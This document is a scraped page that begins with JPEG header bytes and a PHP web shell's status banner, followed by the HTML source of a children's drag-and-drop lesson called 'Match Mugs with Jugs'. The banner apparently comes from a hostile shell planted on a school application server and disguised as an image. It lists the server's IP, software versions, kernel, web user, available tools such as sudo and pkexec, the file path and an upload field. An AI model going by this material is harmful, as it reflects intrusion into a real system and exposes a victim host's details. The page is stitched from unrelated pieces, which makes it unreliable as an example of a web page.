????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.107 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old/Html/LevelA/Category2/ |
Upload File : |
<!doctype html>
<html>
<head>
<title>Match Mugs with Jugs</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<style>
.style_Questions
{
padding-left: 10px;
text-align: left;
font-size: 24px;
font-family: "Arial Rounded MT Bold";
font-weight: bold;
color: #000;
}
.style_Answers
{
color: #F00;
}
.id_td
{
border: 1px;
text-align:center;
}
.cls_tdRemoveBorderBottom
{
text-align:center;
border-bottom: 0px;
border-left: 0px;
border-right: 0px;
}
.style_borderNone
{
border:none;
border-collapse:collapse;
}
.textFont
{
padding-left: 10px;
font-size: 22px;
font-family: "Arial Rounded MT Bold";
font-style: italic;
color: #000;
}
.textColourRed
{
color: #F00;
}
.style_padding_bottom_zero
{
padding-bottom: 0px;
}
</style>
<script>
function page_preLoad()
{
setPageImages();
shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.A, Category.No2, 22), true, true);
shared_setFooterTable('id_tblFooter', true, true, false, true, true);
}
function page_onLoad()
{
shared_set_debugInfo(Level.A, Category.No2);
shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
}
function setPageImages()
{
var imagesPath = "../../../img/LevelA/Category2/LevelACat2Lesson22/";
shared_setImageSource('id_imgWaterMug', imagesPath, 'waterMug.png');
shared_setImageSource('id_imgTeaCups', imagesPath, 'teaCups.png');
shared_setImageSource('id_imgJuiceCups', imagesPath, 'juiceCups.png');
shared_setImageSource('id_imgMilkCups', imagesPath, 'milkCups.png');
shared_setImageSource('id_imgJuiceJug', imagesPath, 'juiceJug.png');
shared_setImageSource('id_imgMilkJug', imagesPath, 'milkJug.png');
shared_setImageSource('id_imgWaterJug', imagesPath, 'waterJug.png');
shared_setImageSource('id_imgTeaJug', imagesPath, 'teaJug.png');
}
function btnPrevious_click()
{
window.location = "LevelACat2Lesson21.html";
}
function btnNext_click()
{
window.location = "LevelACat2Lesson23.html";
}
function btnHome_click()
{
shared_btnHomeCategories_click('LevelA');
}
function DragDrop(id_dropBox, id_imgElement)
{
shared_dragDropImage(shared_currentDropingId, id_dropBox, id_imgElement);
isAllInfosMovedShowClapsAnimation();
}
function isAllInfosMovedShowClapsAnimation()
{
var allElementIdsArray = ['id_SpanImgJuiceCups', 'id_SpanImgMilkCups', 'id_SpanImgWaterMug', 'id_SpanImgTeaCups'];
shared_is_all_infos_moved_show_claps_animation(allElementIdsArray, 'shared_id_div_claps_image');
}
</script>
</head>
<body onload="page_onLoad()">
<div id="shared_id_div_claps_image">
</div>
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
<tr height="5%">
<td>
<header height="100%">
<div id="id_tblHeader" align="center"></div>
</header>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="5%">
<td class="style_borderNone">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="5" style="border-left: none; border-right: none; border-top: none">
<tr>
<td class="textFont" style="border: none"><u>Follow the instructions and match:</u></td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="5">
<tr height="20%">
<td class="style_padding_bottom_zero">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td class="id_td" width="25%">
<span id="id_SpanImgWaterMug" class="cls_SpanImgWaterMug">
<img id="id_imgWaterMug">
</span>
</td>
<td class="id_td" width="25%">
<span id="id_SpanImgTeaCups" class="cls_SpanImgTeaCups">
<img id="id_imgTeaCups">
</span>
</td>
<td class="id_td" width="25%">
<span id="id_SpanImgJuiceCups" class="cls_SpanImgJuiceCups">
<img id="id_imgJuiceCups">
</span>
</td>
<td class="id_td" width="*">
<span id="id_SpanImgMilkCups" class="cls_SpanImgMilkCups">
<img id="id_imgMilkCups">
</span>
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="5">
<tr height="25%">
<td width="53%" class="textFont" style="text-align: center; border-bottom: 0px; border-right: 0px">
<span style="color: black">Put 2 </span><span style="color: red">mug</span>s of juice into this<span style="color: red"> jug.</span>
</td>
<td width="15%" class="cls_tdRemoveBorderBottom">
<img id="id_imgJuiceJug">
</td>
<td width="*" id="id_BoxForJuiceMug" class="cls_BoxForJuiceMug" style="text-align:center; border-bottom: none">
</td>
</tr>
<tr height="25%">
<td width="53%" class="textFont" style="text-align: center; border-bottom: 0px; border-right: 0px">
<span style="color: black">Put 3 </span><span style="color: red">mug</span>s of milk into this<span style="color: red"> jug.</span>
</td>
<td width="15%" class="cls_tdRemoveBorderBottom">
<img id="id_imgMilkJug">
</td>
<td width="*" id="id_BoxForMilkMug" class="cls_BoxForHalfOrange" style="text-align:center; border-bottom: none">
</td>
</tr>
<tr height="25%">
<td width="53%" class="textFont" style="text-align: center; border-bottom: 0px; border-right: 0px"><span style="color: black">Put 1 </span><span style="color: red">mug</span> of water into this<span style="color: red"> jug.</span></td>
<td width="15%" align="center" class="cls_tdRemoveBorderBottom">
<img id="id_imgWaterJug">
</td>
<td width="*" id="id_BoxForWaterMug" class="cls_BoxForHalfApple" style="text-align:center; border-bottom: none">
</td>
</tr>
<tr height="*">
<td width="53%" class="textFont" style="text-align: center; border-right: 0px">
<span style="color: black">Put 4 </span><span style="color: red">mug</span>s of tea into this<span style="color: red"> jug.</span>
</td>
<td width="15%" style="text-align:center; border-left: 0px; border-right: 0px">
<img id="id_imgTeaJug">
</td>
<td width="*" id="id_BoxForTeaMug" class="cls_BoxForHalfWatermelon" style="text-align:center">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="5%">
<td>
<footer height="100%">
<div id="id_tblFooter" align="center"></div>
</footer>
</td>
</tr>
</table>
<script>
page_preLoad();
new webkit_draggable('id_SpanImgWaterMug', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanImgWaterMug'}});
new webkit_draggable('id_SpanImgTeaCups', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanImgTeaCups'}});
new webkit_draggable('id_SpanImgJuiceCups', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanImgJuiceCups'}});
new webkit_draggable('id_SpanImgMilkCups', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanImgMilkCups'}});
webkit_drop.add('id_BoxForJuiceMug', {accept:["cls_SpanImgJuiceCups"], onDrop : function(){DragDrop('id_BoxForJuiceMug', 'id_imgJuiceCups')}});
webkit_drop.add('id_BoxForMilkMug', {accept:["cls_SpanImgMilkCups"], onDrop : function(){DragDrop('id_BoxForMilkMug', 'id_imgMilkCups')}});
webkit_drop.add('id_BoxForWaterMug', {accept:["cls_SpanImgWaterMug"], onDrop : function(){DragDrop('id_BoxForWaterMug', 'id_imgWaterMug')}});
webkit_drop.add('id_BoxForTeaMug', {accept:["cls_SpanImgTeaCups"], onDrop : function(){DragDrop('id_BoxForTeaMug', 'id_imgTeaCups')}});
</script>
</body>
</html>